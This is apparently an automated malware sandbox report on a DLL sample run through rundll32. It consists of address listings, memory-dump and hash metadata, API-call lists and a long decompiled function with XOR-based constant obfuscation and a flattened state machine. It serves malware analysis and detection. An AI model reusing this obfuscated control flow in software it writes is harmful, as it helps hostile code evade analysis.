                                                                                                                      0x001879ea
                                                                                                                      0x001879ea
                                                                                                                      0x001879ea
                                                                                                                      0x001879f0
                                                                                                                      0x001879f5
                                                                                                                      0x001879fb
                                                                                                                      0x00187afa
                                                                                                                      0x00187afb
                                                                                                                      0x00187afe
                                                                                                                      0x00187aff
                                                                                                                      0x00187b04
                                                                                                                      0x00187b09
                                                                                                                      0x00187b1f
                                                                                                                      0x00187b28
                                                                                                                      0x00187b2d
                                                                                                                      0x00187b33
                                                                                                                      0x00187b3a
                                                                                                                      0x00187b3f
                                                                                                                      0x00187b3f
                                                                                                                      0x00187b41
                                                                                                                      0x00187b44
                                                                                                                      0x00187b47
                                                                                                                      0x00187b49
                                                                                                                      0x00187b4c
                                                                                                                      0x00187b4c
                                                                                                                      0x00000000
                                                                                                                      0x00187b4c
                                                                                                                      0x00187a03
                                                                                                                      0x00187aa8
                                                                                                                      0x00187ac5
                                                                                                                      0x00187acc
                                                                                                                      0x00187ad1
                                                                                                                      0x00187ad4
                                                                                                                      0x00187ad8
                                                                                                                      0x00187ae7
                                                                                                                      0x00187ada
                                                                                                                      0x00187adc
                                                                                                                      0x00187ae1
                                                                                                                      0x00187ae1
                                                                                                                      0x00000000
                                                                                                                      0x00187ad8
                                                                                                                      0x00187a0b
                                                                                                                      0x00187b94
                                                                                                                      0x00187bb5
                                                                                                                      0x00187bc0
                                                                                                                      0x00187bc9
                                                                                                                      0x00187bc9
                                                                                                                      0x00187a17
                                                                                                                      0x00187b75
                                                                                                                      0x00000000
                                                                                                                      0x00187b7b
                                                                                                                      0x00187a1d
                                                                                                                      0x00187a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00187a29
                                                                                                                      0x00187a2d
                                                                                                                      0x00187a3c
                                                                                                                      0x00187a63
                                                                                                                      0x00187a83
                                                                                                                      0x00187a87
                                                                                                                      0x00187a8a
                                                                                                                      0x00187a8f
                                                                                                                      0x00187a95
                                                                                                                      0x00000000
                                                                                                                      0x00187b51
                                                                                                                      0x00187b51
                                                                                                                      0x00000000
                                                                                                                      0x00187b5d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: V$!<z$-.$4R$7J5$FfF$Kg$c$j5$wZ9H
                                                                                                                      • API String ID: 0-218644068
                                                                                                                      • Opcode ID: f21aca021f5657eb344d1c303c1e4b32f1550ca8b823ec0aa786810b6cab46f2
                                                                                                                      • Instruction ID: 6ef73a04664a2e209af131bd310d97bd07deb05570b00987a5fae2d1d2524216
                                                                                                                      • Opcode Fuzzy Hash: f21aca021f5657eb344d1c303c1e4b32f1550ca8b823ec0aa786810b6cab46f2
                                                                                                                      • Instruction Fuzzy Hash: 660222725083809FD3A8DF25D48A64BFBF2FBC5718F50891DF29986261DBB58948CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                      • CharUpperA.USER32 ref: 10021943
                                                                                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3249967234-0
                                                                                                                      • Opcode ID: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction ID: ae62b421250eabce0d7e10c45050fda11272d0be93f4f0cc1201f2dd6aedebe3
                                                                                                                      • Opcode Fuzzy Hash: 2a3499f3841ad5e8647b8f951358b7882037f476afa2bf570201f6c7d6c9b385
                                                                                                                      • Instruction Fuzzy Hash: 1B41DE7990024AAFEB11DBB4DC85AFF77BCEF15355F800529F815E2192EB30A9448A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00176083(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                      				char _v256;
                                                                                                                      				char _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				void* _t385;
                                                                                                                      				void* _t420;
                                                                                                                      				intOrPtr _t421;
                                                                                                                      				intOrPtr _t422;
                                                                                                                      				void* _t428;
                                                                                                                      				void* _t430;
                                                                                                                      				intOrPtr _t439;
                                                                                                                      				intOrPtr _t440;
                                                                                                                      				intOrPtr _t447;
                                                                                                                      				intOrPtr _t448;
                                                                                                                      				signed int _t451;
                                                                                                                      				void* _t458;
                                                                                                                      				intOrPtr _t460;
                                                                                                                      				intOrPtr _t461;
                                                                                                                      				intOrPtr _t495;
                                                                                                                      				signed int _t502;
                                                                                                                      				signed int _t503;
                                                                                                                      				signed int _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				signed int _t513;
                                                                                                                      				void* _t514;
                                                                                                                      				signed int* _t516;
                                                                                                                      				void* _t520;
                                                                                                                      
                                                                                                                      				_push(_a20);
                                                                                                                      				_t514 = __edx;
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t385);
                                                                                                                      				_v320 = 0x5bfd8;
                                                                                                                      				_t516 =  &(( &_v424)[7]);
                                                                                                                      				_v320 = _v320 ^ 0xae83e4b4;
                                                                                                                      				_v320 = _v320 + 0xffffbfdd;
                                                                                                                      				_t448 = 0;
                                                                                                                      				_v320 = _v320 ^ 0xae801261;
                                                                                                                      				_t451 = 0x4bae340;
                                                                                                                      				_v384 = 0x359b5d;
                                                                                                                      				_v384 = _v384 >> 9;
                                                                                                                      				_v384 = _v384 + 0x5a0;
                                                                                                                      				_v384 = _v384 ^ 0x40b7bf66;
                                                                                                                      				_v384 = _v384 ^ 0x40befa95;
                                                                                                                      				_v316 = 0x2933e6;
                                                                                                                      				_t502 = 0x13;
                                                                                                                      				_t504 = 0xf;
                                                                                                                      				_v316 = _v316 * 0x63;
                                                                                                                      				_v316 = _v316 ^ 0x0fe001ce;
                                                                                                                      				_v300 = 0x5708b8;
                                                                                                                      				_v300 = _v300 | 0xa16343bc;
                                                                                                                      				_v300 = _v300 ^ 0xa1786c90;
                                                                                                                      				_v308 = 0x5d4fad;
                                                                                                                      				_v308 = _v308 + 0xffffde8c;
                                                                                                                      				_v308 = _v308 ^ 0x0055ed4e;
                                                                                                                      				_v312 = 0x97068f;
                                                                                                                      				_v312 = _v312 >> 1;
                                                                                                                      				_v312 = _v312 ^ 0x0045ea4b;
                                                                                                                      				_v284 = 0xe9a634;
                                                                                                                      				_v284 = _v284 ^ 0x5bc7ef92;
                                                                                                                      				_v284 = _v284 ^ 0x5b2ed6c9;
                                                                                                                      				_v344 = 0xd52660;
                                                                                                                      				_v344 = _v344 + 0x6034;
                                                                                                                      				_v344 = _v344 >> 7;
                                                                                                                      				_v344 = _v344 ^ 0x000a9937;
                                                                                                                      				_v412 = 0x492529;
                                                                                                                      				_t55 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t55 * 0xa;
                                                                                                                      				_t57 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t57 / _t502;
                                                                                                                      				_t63 =  &_v412; // 0x492529
                                                                                                                      				_v412 =  *_t63 / _t504;
                                                                                                                      				_v412 = _v412 ^ 0x000522b4;
                                                                                                                      				_v360 = 0xff1035;
                                                                                                                      				_v360 = _v360 >> 5;
                                                                                                                      				_v360 = _v360 << 5;
                                                                                                                      				_v360 = _v360 ^ 0x00f6febc;
                                                                                                                      				_v352 = 0x24acbd;
                                                                                                                      				_v352 = _v352 >> 0xc;
                                                                                                                      				_v352 = _v352 * 0x36;
                                                                                                                      				_v352 = _v352 ^ 0x000a49b8;
                                                                                                                      				_v404 = 0x5e8a96;
                                                                                                                      				_v404 = _v404 >> 1;
                                                                                                                      				_v404 = _v404 / _t502;
                                                                                                                      				_v404 = _v404 + 0xffff7de4;
                                                                                                                      				_v404 = _v404 ^ 0x00019221;
                                                                                                                      				_v372 = 0xa45532;
                                                                                                                      				_v372 = _v372 + 0xffff1c48;
                                                                                                                      				_v372 = _v372 + 0xffffe0f0;
                                                                                                                      				_t505 = 0x6c;
                                                                                                                      				_v372 = _v372 * 0x6c;
                                                                                                                      				_v372 = _v372 ^ 0x44ea3f2c;
                                                                                                                      				_v380 = 0xf56085;
                                                                                                                      				_v380 = _v380 / _t505;
                                                                                                                      				_t506 = 0xd;
                                                                                                                      				_v380 = _v380 / _t506;
                                                                                                                      				_v380 = _v380 << 0xe;
                                                                                                                      				_v380 = _v380 ^ 0x0b2ea957;
                                                                                                                      				_v328 = 0x46776f;
                                                                                                                      				_v328 = _v328 + 0x15ec;
                                                                                                                      				_t507 = 0x1c;
                                                                                                                      				_v328 = _v328 * 0x5e;
                                                                                                                      				_v328 = _v328 ^ 0x19ebcb1f;
                                                                                                                      				_v388 = 0xfbc23f;
                                                                                                                      				_v388 = _v388 | 0xf6357e00;
                                                                                                                      				_v388 = _v388 + 0x8932;
                                                                                                                      				_v388 = _v388 ^ 0xf4ea365f;
                                                                                                                      				_v388 = _v388 ^ 0x03ea209f;
                                                                                                                      				_v336 = 0x730db6;
                                                                                                                      				_v336 = _v336 * 0x5b;
                                                                                                                      				_v336 = _v336 | 0x6492896b;
                                                                                                                      				_v336 = _v336 ^ 0x6cf77a3a;
                                                                                                                      				_v340 = 0x166b3b;
                                                                                                                      				_v340 = _v340 | 0x8c211161;
                                                                                                                      				_v340 = _v340 ^ 0x8c378fd9;
                                                                                                                      				_v396 = 0x9d5a93;
                                                                                                                      				_v396 = _v396 / _t507;
                                                                                                                      				_v396 = _v396 ^ 0xba861a50;
                                                                                                                      				_v396 = _v396 + 0xffff5b99;
                                                                                                                      				_v396 = _v396 ^ 0xba80e2b9;
                                                                                                                      				_v420 = 0x409c68;
                                                                                                                      				_t508 = 0x31;
                                                                                                                      				_v420 = _v420 / _t508;
                                                                                                                      				_v420 = _v420 >> 8;
                                                                                                                      				_t509 = 5;
                                                                                                                      				_v420 = _v420 * 0x16;
                                                                                                                      				_v420 = _v420 ^ 0x00013fee;
                                                                                                                      				_v296 = 0xc785e1;
                                                                                                                      				_v296 = _v296 ^ 0x791e03db;
                                                                                                                      				_v296 = _v296 ^ 0x79d79a97;
                                                                                                                      				_v364 = 0xad0976;
                                                                                                                      				_v364 = _v364 | 0x8850e8a8;
                                                                                                                      				_v364 = _v364 << 1;
                                                                                                                      				_v364 = _v364 ^ 0x11fb25d1;
                                                                                                                      				_v368 = 0x704a10;
                                                                                                                      				_v368 = _v368 + 0xffff0d6b;
                                                                                                                      				_v368 = _v368 << 2;
                                                                                                                      				_v368 = _v368 ^ 0x01b3e76e;
                                                                                                                      				_v288 = 0x54d2f6;
                                                                                                                      				_v288 = _v288 / _t509;
                                                                                                                      				_v288 = _v288 ^ 0x001edf05;
                                                                                                                      				_v392 = 0x949bbb;
                                                                                                                      				_v392 = _v392 + 0xbb88;
                                                                                                                      				_v392 = _v392 | 0xb3cb4dcc;
                                                                                                                      				_v392 = _v392 * 0x45;
                                                                                                                      				_v392 = _v392 ^ 0x7b348758;
                                                                                                                      				_v416 = 0x643691;
                                                                                                                      				_v416 = _v416 >> 9;
                                                                                                                      				_v416 = _v416 + 0xffff74a1;
                                                                                                                      				_t510 = 0x4e;
                                                                                                                      				_v416 = _v416 / _t510;
                                                                                                                      				_v416 = _v416 ^ 0x03464fba;
                                                                                                                      				_v356 = 0xeb775b;
                                                                                                                      				_v356 = _v356 + 0xdb8c;
                                                                                                                      				_v356 = _v356 >> 0x10;
                                                                                                                      				_v356 = _v356 ^ 0x0001ede4;
                                                                                                                      				_v304 = 0xc1e7b5;
                                                                                                                      				_v304 = _v304 + 0xf3ef;
                                                                                                                      				_v304 = _v304 ^ 0x00c2397a;
                                                                                                                      				_v376 = 0xa68bc9;
                                                                                                                      				_t511 = 0x43;
                                                                                                                      				_v376 = _v376 / _t511;
                                                                                                                      				_v376 = _v376 >> 8;
                                                                                                                      				_v376 = _v376 ^ 0x3383f04e;
                                                                                                                      				_v376 = _v376 ^ 0x3381e4d6;
                                                                                                                      				_v408 = 0x4d9cfa;
                                                                                                                      				_t512 = 0x46;
                                                                                                                      				_t503 = _v340;
                                                                                                                      				_v408 = _v408 * 0x6f;
                                                                                                                      				_v408 = _v408 + 0x3c4a;
                                                                                                                      				_v408 = _v408 << 2;
                                                                                                                      				_v408 = _v408 ^ 0x869e5b7f;
                                                                                                                      				_v324 = 0x71360b;
                                                                                                                      				_v324 = _v324 * 0xc;
                                                                                                                      				_v324 = _v324 ^ 0x901d1633;
                                                                                                                      				_v324 = _v324 ^ 0x9559eaf9;
                                                                                                                      				_v292 = 0x9a124c;
                                                                                                                      				_v292 = _v292 + 0x530b;
                                                                                                                      				_v292 = _v292 ^ 0x0097d0f0;
                                                                                                                      				_v424 = 0x6705b6;
                                                                                                                      				_v424 = _v424 ^ 0xd04d23dd;
                                                                                                                      				_v424 = _v424 << 4;
                                                                                                                      				_v424 = _v424 >> 0xa;
                                                                                                                      				_v424 = _v424 ^ 0x000c33e5;
                                                                                                                      				_v348 = 0x1e9503;
                                                                                                                      				_v348 = _v348 >> 3;
                                                                                                                      				_v348 = _v348 ^ 0x290fe667;
                                                                                                                      				_v348 = _v348 ^ 0x2908b2d4;
                                                                                                                      				_v400 = 0xb348f5;
                                                                                                                      				_v400 = _v400 ^ 0x711fc93f;
                                                                                                                      				_v400 = _v400 << 8;
                                                                                                                      				_v400 = _v400 * 0x58;
                                                                                                                      				_v400 = _v400 ^ 0x4c97e764;
                                                                                                                      				_v332 = 0xe64092;
                                                                                                                      				_t513 = _v340;
                                                                                                                      				_v332 = _v332 / _t512;
                                                                                                                      				_v332 = _v332 + 0x1e96;
                                                                                                                      				_v332 = _v332 ^ 0x00036ca6;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t420 = 0xee6d0ab;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t520 = _t451 - 0x77439d8;
                                                                                                                      							if(_t520 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t520 == 0) {
                                                                                                                      								E001768DE(_v420, _v296, _v364, _v368, _v264);
                                                                                                                      								_t516 =  &(_t516[3]);
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0x195d899) {
                                                                                                                      									_t460 =  *0x195214; // 0x0
                                                                                                                      									_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0x3c)) + 0x58));
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x38)) =  *((intOrPtr*)(_t460 + 0x38)) + 1;
                                                                                                                      									_t495 =  *((intOrPtr*)(_t460 + 0x38));
                                                                                                                      									 *((intOrPtr*)(_t460 + 0x3c)) = _t439;
                                                                                                                      									if(_t439 == 0) {
                                                                                                                      										 *((intOrPtr*)(_t460 + 0x3c)) =  *((intOrPtr*)(_t460 + 4));
                                                                                                                      									}
                                                                                                                      									_t440 =  *0x195214; // 0x0
                                                                                                                      									if(_t495 >=  *((intOrPtr*)(_t440 + 0x44))) {
                                                                                                                      										_t461 =  *0x195214; // 0x0
                                                                                                                      										 *(_t461 + 0x38) =  *(_t461 + 0x38) & 0x00000000;
                                                                                                                      									} else {
                                                                                                                      										_t451 = 0x4bae340;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 == 0x2f9aadd) {
                                                                                                                      										E001768DE(_v288, _v392, _v416, _v356, _v280);
                                                                                                                      										E001768DE(_v304, _v376, _v408, _v324, _t513);
                                                                                                                      										E001768DE(_v292, _v424, _v348, _v400, _v272);
                                                                                                                      										_t516 =  &(_t516[9]);
                                                                                                                      										_t451 = _t503;
                                                                                                                      										L33:
                                                                                                                      										_t420 = 0xee6d0ab;
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										if(_t451 == 0x4bae340) {
                                                                                                                      											_t513 = 0;
                                                                                                                      											E00191310(0x100,  &_v256, _v320, _v384, _v316, _v300);
                                                                                                                      											_v272 = _v272 & 0;
                                                                                                                      											_t516 =  &(_t516[4]);
                                                                                                                      											_v268 = _v268 & 0;
                                                                                                                      											_t451 = 0xce40172;
                                                                                                                      											_v280 = _v280 & 0;
                                                                                                                      											_v276 = _v276 & 0;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t451 != 0x55bcf65) {
                                                                                                                      												goto L34;
                                                                                                                      											} else {
                                                                                                                      												if(_v276 >= _v332) {
                                                                                                                      													_t447 = E00186864( &_v280,  &_v272);
                                                                                                                      												} else {
                                                                                                                      													_t447 = E00182753( &_v280);
                                                                                                                      												}
                                                                                                                      												_t513 = _t447;
                                                                                                                      												_t420 = 0xee6d0ab;
                                                                                                                      												_t451 =  !=  ? 0xee6d0ab : 0x2f9aadd;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L37:
                                                                                                                      							return _t448;
                                                                                                                      						}
                                                                                                                      						if(_t451 == 0xa3ea571) {
                                                                                                                      							_t421 =  *0x195214; // 0x0
                                                                                                                      							_t422 =  *0x195214; // 0x0
                                                                                                                      							_t428 = E00187BCA(( *(_t421 + 0x3c))[0x28] & 0x0000ffff,  &_v256,  *( *(_t421 + 0x3c)) & 0x0000ffff, _v372, _v380, _v328, _t513,  &_v272,  &_v264, _v388,  *((intOrPtr*)(_t422 + 0x3c)) + 0x20, _v336);
                                                                                                                      							_t516 =  &(_t516[0xa]);
                                                                                                                      							if(_t428 == 0) {
                                                                                                                      								_t503 = 0x195d899;
                                                                                                                      								_t451 = 0x2f9aadd;
                                                                                                                      								goto L33;
                                                                                                                      							} else {
                                                                                                                      								_t451 = 0xcddb738;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t451 == 0xcddb738) {
                                                                                                                      								if(E0017BD0F( &_v264, _v340, _t514, _v396) == 0) {
                                                                                                                      									_t503 = 0x195d899;
                                                                                                                      								} else {
                                                                                                                      									_t503 = 0x1fe0da0;
                                                                                                                      									_t448 = 1;
                                                                                                                      								}
                                                                                                                      								_t451 = 0x77439d8;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t420 = 0xee6d0ab;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t451 == 0xce40172) {
                                                                                                                      									_t430 = E00171F9B(_a20,  &_v280, _v308, _v312, _v284, _v344, _a8);
                                                                                                                      									_t516 =  &(_t516[5]);
                                                                                                                      									if(_t430 != 0) {
                                                                                                                      										_t451 = 0x55bcf65;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t451 != _t420) {
                                                                                                                      										goto L34;
                                                                                                                      									} else {
                                                                                                                      										_push(E0017EF71(1, 0x40));
                                                                                                                      										_push(_v404);
                                                                                                                      										_push( &_v256);
                                                                                                                      										_t458 = 0xb;
                                                                                                                      										E00175A07(_t458, _v352);
                                                                                                                      										_t516 =  &(_t516[5]);
                                                                                                                      										_t451 = 0xa3ea571;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t420 = 0xee6d0ab;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L37;
                                                                                                                      						L34:
                                                                                                                      					} while (_t451 != 0x1fe0da0);
                                                                                                                      					goto L37;
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00176526
                                                                                                                      0x00176531
                                                                                                                      0x0017653c
                                                                                                                      0x00176547
                                                                                                                      0x0017654f
                                                                                                                      0x00176557
                                                                                                                      0x0017655c
                                                                                                                      0x00176561
                                                                                                                      0x00176569
                                                                                                                      0x00176571
                                                                                                                      0x00176576
                                                                                                                      0x0017657e
                                                                                                                      0x00176586
                                                                                                                      0x0017658e
                                                                                                                      0x00176596
                                                                                                                      0x001765a0
                                                                                                                      0x001765a4
                                                                                                                      0x001765ac
                                                                                                                      0x001765ba
                                                                                                                      0x001765be
                                                                                                                      0x001765c2
                                                                                                                      0x001765ca
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d7
                                                                                                                      0x001765d7
                                                                                                                      0x001765d7
                                                                                                                      0x001765d7
                                                                                                                      0x001765dd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001765e3
                                                                                                                      0x0017675c
                                                                                                                      0x00176761
                                                                                                                      0x00176764
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x00000000
                                                                                                                      0x001765d2
                                                                                                                      0x001765e9
                                                                                                                      0x001765ef
                                                                                                                      0x0017670b
                                                                                                                      0x00176714
                                                                                                                      0x00176717
                                                                                                                      0x0017671a
                                                                                                                      0x0017671d
                                                                                                                      0x00176722
                                                                                                                      0x00176727
                                                                                                                      0x00176727
                                                                                                                      0x0017672a
                                                                                                                      0x00176732
                                                                                                                      0x001768c7
                                                                                                                      0x001768cd
                                                                                                                      0x00176738
                                                                                                                      0x00176738
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x00000000
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765f5
                                                                                                                      0x001765fb
                                                                                                                      0x001766be
                                                                                                                      0x001766da
                                                                                                                      0x001766fc
                                                                                                                      0x00176701
                                                                                                                      0x00176704
                                                                                                                      0x001768b4
                                                                                                                      0x001768b4
                                                                                                                      0x00000000
                                                                                                                      0x00176601
                                                                                                                      0x00176607
                                                                                                                      0x00176669
                                                                                                                      0x00176676
                                                                                                                      0x0017667b
                                                                                                                      0x00176682
                                                                                                                      0x00176685
                                                                                                                      0x0017668c
                                                                                                                      0x00176691
                                                                                                                      0x00176698
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x00000000
                                                                                                                      0x001765d2
                                                                                                                      0x00176609
                                                                                                                      0x0017660f
                                                                                                                      0x00000000
                                                                                                                      0x00176615
                                                                                                                      0x00176627
                                                                                                                      0x00176637
                                                                                                                      0x00176629
                                                                                                                      0x00176629
                                                                                                                      0x00176629
                                                                                                                      0x0017663c
                                                                                                                      0x00176645
                                                                                                                      0x0017664a
                                                                                                                      0x00000000
                                                                                                                      0x0017664a
                                                                                                                      0x0017660f
                                                                                                                      0x00176607
                                                                                                                      0x001765fb
                                                                                                                      0x001765ef
                                                                                                                      0x001768d4
                                                                                                                      0x001768dd
                                                                                                                      0x001768dd
                                                                                                                      0x00176774
                                                                                                                      0x0017684d
                                                                                                                      0x0017685c
                                                                                                                      0x00176894
                                                                                                                      0x00176899
                                                                                                                      0x0017689e
                                                                                                                      0x001768aa
                                                                                                                      0x001768af
                                                                                                                      0x00000000
                                                                                                                      0x001768a0
                                                                                                                      0x001768a0
                                                                                                                      0x00000000
                                                                                                                      0x001768a0
                                                                                                                      0x0017677a
                                                                                                                      0x00176780
                                                                                                                      0x0017682e
                                                                                                                      0x0017683a
                                                                                                                      0x00176830
                                                                                                                      0x00176832
                                                                                                                      0x00176837
                                                                                                                      0x00176837
                                                                                                                      0x0017683f
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x00000000
                                                                                                                      0x001765d2
                                                                                                                      0x00176786
                                                                                                                      0x0017678c
                                                                                                                      0x001767fb
                                                                                                                      0x00176800
                                                                                                                      0x00176805
                                                                                                                      0x0017680b
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x00000000
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x0017678e
                                                                                                                      0x00176790
                                                                                                                      0x00000000
                                                                                                                      0x00176796
                                                                                                                      0x001767a7
                                                                                                                      0x001767a8
                                                                                                                      0x001767b7
                                                                                                                      0x001767ba
                                                                                                                      0x001767bb
                                                                                                                      0x001767c0
                                                                                                                      0x001767c3
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x00000000
                                                                                                                      0x001765d2
                                                                                                                      0x001765d2
                                                                                                                      0x00176790
                                                                                                                      0x0017678c
                                                                                                                      0x00176780
                                                                                                                      0x00000000
                                                                                                                      0x001768b9
                                                                                                                      0x001768b9
                                                                                                                      0x00000000
                                                                                                                      0x001768c5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: cb892dbf0e02d5c680a1bc3735fc6967582ad95351359404022272d1af05de5b
